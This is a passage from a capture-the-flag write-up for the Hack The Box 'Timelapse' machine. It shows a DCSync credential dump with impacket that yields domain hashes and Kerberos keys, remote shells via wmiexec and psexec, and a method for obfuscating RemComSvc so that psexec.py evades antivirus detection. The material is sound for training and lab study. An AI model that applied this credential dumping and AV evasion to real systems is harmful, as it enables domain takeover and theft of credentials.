# refldap://DomainDnsZones.timelapse.htb/DC=DomainDnsZones,DC=timelapse,DC=htb

# refldap://timelapse.htb/CN=Configuration,DC=timelapse,DC=htb
```

We can perform a DCSync with those credentials:

```console
opcode@parrot$ secretsdump.py timelapse.htb/'dc01$':'EQ0ePF];6q!,()65Xal%W4E3'@dc01.timelapse.htb
```

It didn't work. I tried the username Administrator next:

```console
opcode@parrot$ secretsdump.py timelapse.htb/Administrator:'EQ0ePF];6q!,()65Xal%W4E3'@dc01.timelapse.htb
Impacket v0.12.0.dev1+20230817.32422.a769683f - Copyright 2023 Fortra

[*] Target system bootKey: 0xd88b7b8c98a711544956c8ac71fbe251
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6b16cb063fdaddb773ba256dd72a14b7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
TIMELAPSE\DC01$:aes256-cts-hmac-sha1-96:92da1e2be2248b1cbabf35687b697338e03075763292ac692e0c589ca806299f
TIMELAPSE\DC01$:aes128-cts-hmac-sha1-96:b77555c4d1a0a0131796b3241ab91cec
TIMELAPSE\DC01$:des-cbc-md5:bf910201a7f146d3
TIMELAPSE\DC01$:plain_password_hex:e06fbb5eb9149764ef8508b1e247cbf7f61a9dfd0c60dcb182e799570aa6f44b7e281054c80208b88901f4b79c1289fb5c1177b83586759caced4ec35c64f7d1ef464c438cf5a439c3e36a66cd69e83fd4a642f290e9c38811cba410c25466a823b2992821641b9365418582a686136aecfe7f16dedd529c7c69189e10959642d4da097e6443436a500718d9eef6c7cfbc122d60f8b93433ccae533bac90c6adf6ff193062e369fb24a16633b4b40047e37ffb919d9a9f7d96e65efcfed8fb5f5f036af26b2652856862c14fd6f2263a06aa45e337c1a38761ec009d00be80693ed0578763ac9930bb7a3695fe15ba45
TIMELAPSE\DC01$:aad3b435b51404eeaad3b435b51404ee:f9eb71512ffb75367b5ea49a0995e51b:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xbc6b4be0de66f262c75df7ae4f7dadf34fa03ddc
dpapi_userkey:0x074fe8860a0fbca40b902c409998b1b9cd332cd1
[*] NL$KM 
 0000   AE 8C BD 2F 8A B9 48 87  5F F2 1E 2C 42 14 57 5E   .../..H._..,B.W^
 0010   90 E6 1C AC CD 23 42 26  CE D7 1F B5 D3 7F D6 44   .....#B&.......D
 0020   6B 29 7B 58 FF 89 BD A7  45 96 EF 5A 96 B1 E1 07   k){X....E..Z....
 0030   1F 71 9D 9D 0F E1 1D 1E  3A 95 DD 4F 13 A9 A6 92   .q......:..O....
NL$KM:ae8cbd2f8ab948875ff21e2c4214575e90e61caccd234226ced71fb5d37fd6446b297b58ff89bda74596ef5a96b1e1071f719d9d0fe11d1e3a95dd4f13a9a692
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f058eb822da08fa7a82c22c43ea0c5c5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2960d580f05cd511b3da3d3663f3cb37:::
timelapse.htb\thecybergeek:1601:aad3b435b51404eeaad3b435b51404ee:c81875d2b3cd404f3c8eadc820248f06:::
timelapse.htb\payl0ad:1602:aad3b435b51404eeaad3b435b51404ee:f63b1edaad2ee253c3c228c6e08d1ea0:::
timelapse.htb\legacyy:1603:aad3b435b51404eeaad3b435b51404ee:93da975bcea111839cc584f2f528d63e:::
timelapse.htb\sinfulz:1604:aad3b435b51404eeaad3b435b51404ee:72b236d9b0d49860267f752f1dfc8103:::
timelapse.htb\babywyrm:1605:aad3b435b51404eeaad3b435b51404ee:d47c7e33d6911bb742fdf040af2e80da:::
timelapse.htb\svc_deploy:3103:aad3b435b51404eeaad3b435b51404ee:c912f3533b7114980dd7b6094be1a9d8:::
timelapse.htb\TRX:5101:aad3b435b51404eeaad3b435b51404ee:4c7121d35cd421cbbd3e44ce83bc923e:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:f9eb71512ffb75367b5ea49a0995e51b:::
DB01$:1606:aad3b435b51404eeaad3b435b51404ee:d9c629d35e3311abba1631dba29ead96:::
WEB01$:1607:aad3b435b51404eeaad3b435b51404ee:3b2910d8e6c79bbb20e8842ea4a9aeac:::
DEV01$:1608:aad3b435b51404eeaad3b435b51404ee:463c7639ff204594dfbebbe71b3c6dbb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:88339e867d7568c5b869725bc2ea62012530a4b879a171315c47f647e0b2cd8b
Administrator:aes128-cts-hmac-sha1-96:8778bfbee300727b05855c24b8a17942
Administrator:des-cbc-md5:fd9bdcb9a4ae5d6e
krbtgt:aes256-cts-hmac-sha1-96:ae4798139ee96d519e7c4678bb77986e2aaa227773b2dfa8d5908f19710a5d5f
krbtgt:aes128-cts-hmac-sha1-96:6a29eb8152bd9e373bb8512a18cbc029
krbtgt:des-cbc-md5:459876d080fd102c
timelapse.htb\thecybergeek:aes256-cts-hmac-sha1-96:1ce6ed23ae74f98e9fb4492b1d6da4abd53050cec84690dba0947da6f5072f7f
timelapse.htb\thecybergeek:aes128-cts-hmac-sha1-96:c9afa87f35f474a9111d52234ece52f6
timelapse.htb\thecybergeek:des-cbc-md5:c83e677c0e376238
timelapse.htb\payl0ad:aes256-cts-hmac-sha1-96:6588d1e91e012cfe69932d2f80f1d55d77b224822472021902735d70bab836dc
timelapse.htb\payl0ad:aes128-cts-hmac-sha1-96:527f8211d77499d99df13c572d4553c0
timelapse.htb\payl0ad:des-cbc-md5:25adceec4c613bb0
timelapse.htb\legacyy:aes256-cts-hmac-sha1-96:710b7e9c9374e4e306e6a9e599ae5f615f4e3e1acabb8a9183ef1d5358a46143
timelapse.htb\legacyy:aes128-cts-hmac-sha1-96:60adfce798b2431f2dee6993b119d591
timelapse.htb\legacyy:des-cbc-md5:160be04ae694e661
timelapse.htb\sinfulz:aes256-cts-hmac-sha1-96:9ce922adc954b7671fea5ff4f68ee1a00ccd18747856cefdfeb6b695dfa2c73b
timelapse.htb\sinfulz:aes128-cts-hmac-sha1-96:504fe2766f85d602ed947ee21f4e0c4e
timelapse.htb\sinfulz:des-cbc-md5:04cedc589234b97a
timelapse.htb\babywyrm:aes256-cts-hmac-sha1-96:98231e7161d5bcdb1db93ab0bf989434e6a6c6d86cfe10977a15eae461b29836
timelapse.htb\babywyrm:aes128-cts-hmac-sha1-96:e591049c737616153abafe43b68fa0e6
timelapse.htb\babywyrm:des-cbc-md5:316ebf795b52ea43
timelapse.htb\svc_deploy:aes256-cts-hmac-sha1-96:10cb46d648b9cc5774fd381c0b43e91c271ec59dada000b01c7ab3f4e614ddd1
timelapse.htb\svc_deploy:aes128-cts-hmac-sha1-96:33493640af7e815f2ecfbf59d9dedcee
timelapse.htb\svc_deploy:des-cbc-md5:c80edfb0ea262613
timelapse.htb\TRX:aes256-cts-hmac-sha1-96:61d799ac74cd09e38786fcda8196705477b7871c15e0cd828849530783f2c93d
timelapse.htb\TRX:aes128-cts-hmac-sha1-96:6948c570d61f5a3c9a941524a809eb3f
timelapse.htb\TRX:des-cbc-md5:269468abe01329ad
DC01$:aes256-cts-hmac-sha1-96:92da1e2be2248b1cbabf35687b697338e03075763292ac692e0c589ca806299f
DC01$:aes128-cts-hmac-sha1-96:b77555c4d1a0a0131796b3241ab91cec
DC01$:des-cbc-md5:c27cbc23cd76758f
DB01$:aes256-cts-hmac-sha1-96:c03fda84ab460db1f0ae9ecc0cd17c9fab52576ac6a4c77df1f600d4b10e0088
DB01$:aes128-cts-hmac-sha1-96:eb8af7494d9cc8e29e9b84923e929410
DB01$:des-cbc-md5:5e9ddae537abe631
WEB01$:aes256-cts-hmac-sha1-96:f9655daa1066e543b94469ac5657d747fb17c9679bb4250efaa1eae177ff285a
WEB01$:aes128-cts-hmac-sha1-96:0a280a2ad97136959ac408c62450b0ed
WEB01$:des-cbc-md5:4fcef1e6b30b68f7
DEV01$:aes256-cts-hmac-sha1-96:06278ffadea2d29dd059f4535284735d0dce00b81c74dfff24a1a679bff976b5
DEV01$:aes128-cts-hmac-sha1-96:da52c69d83ea6c19c7c8a3b19a545a68
DEV01$:des-cbc-md5:f229a754ec46c2e3
[*] Cleaning up... 
```

We can also use `psexec.py` to get a shell:

```console
opcode@parrot$ psexec.py timelapse.htb/Administrator:'EQ0ePF];6q!,()65Xal%W4E3'@dc01.timelapse.htb
```

It gets stuck, likely due to the antivirus. `wmiexec.py` works:

```console
opcode@parrot$ wmiexec.py timelapse.htb/Administrator:'EQ0ePF];6q!,()65Xal%W4E3'@dc01.timelapse.htb
Impacket v0.12.0.dev1+20230817.32422.a769683f - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
timelapse\administrator
```

## Obfuscating RemComSvc to bypass psexec.py detection

I had seen this tweet from [snovvcrash](https://twitter.com/snovvcrash): <https://twitter.com/snovvcrash/status/1620171448982843395>

![2](images/2.png)

And I wanted to try following his approach to bypass the detection of `psexec.py`  
`psexec.py` uses [RemComSvc](https://github.com/kavika13/RemCom) to provide PSEXEC like functionality.  
Therefore, it is heavily signatured by AV products, and `snovvcrash` shared a very hand-holding script to bypass signature-based detection:  
<https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb>

```console
opcode@parrot$ wget https://gist.githubusercontent.com/snovvcrash/123945e8f06c7182769846265637fedb/raw/3437a79b74302621948059e7a63fb39bdcf27260/RemComObf.sh
opcode@parrot$ chmod +x RemComObf.sh
opcode@parrot$ ./RemComObf.sh
[*] Compile: MSBuild.exe 'Remote Command Executor.sln' /t:LxUWRLGW:Rebuild /p:Configuration=Release /p:PlatformToolset=v143
[*] Run: python3 impacket/examples/psexec.py megacorp.local/snovvcrash@192.168.1.11 -file RemComObf/RemComSvc/Release/LxUWRLGWSvc.exe
```

I followed the instructions pretty much on a Windows machine:

```console
PS D:\Opcode\HTB\RemComObf> & 'D:\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe' 'Remote Command Executor.sln' /t:LxUWRLGW:Rebuild /p:Configuration=Release /p:PlatformToolset=v143
```

The path in second command needs to be corrected. I found the PE at `RemComObf/LxUWRLGWSvc/Release/LxUWRLGWSvc.exe`  
I like to play with fire, so I patched the primary `psexec.py` on my system:

```console
opcode@parrot$ sed -i "s/RemCom_/LxUWRLGW_/g" /home/opcode/.local/bin/psexec.py
```

Now we can run `psexec.py`:

```console
opcode@parrot$ psexec.py timelapse.htb/Administrator:'EQ0ePF];6q!,()65Xal%W4E3'@dc01.timelapse.htb -file /home/opcode/CTF/windows/LxUWRLGWSvc.exe
Impacket v0.12.0.dev1+20230817.32422.a769683f - Copyright 2023 Fortra

[*] Requesting shares on dc01.timelapse.htb.....
[*] Found writable share ADMIN$
[*] Uploading file vsUqRKvz.exe
[*] Opening SVCManager on dc01.timelapse.htb.....
[*] Creating service NOuW on dc01.timelapse.htb.....
[*] Starting service NOuW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2686]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

We should revert the changes to `psexec.py` now:

```console
opcode@parrot$ sed -i "s/LxUWRLGW_/RemCom_/g" /home/opcode/.local/bin/psexec.py
```
